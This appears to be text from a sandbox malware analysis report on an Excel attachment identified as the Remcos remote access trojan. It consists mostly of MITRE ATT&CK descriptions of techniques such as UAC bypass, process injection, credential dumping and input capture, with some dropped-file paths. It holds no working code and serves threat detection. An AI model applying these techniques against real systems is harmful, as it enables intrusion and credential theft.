Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Swift tract-20240506_120.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\not\logs.dat

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
Swift tract-20240506_120.xls

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre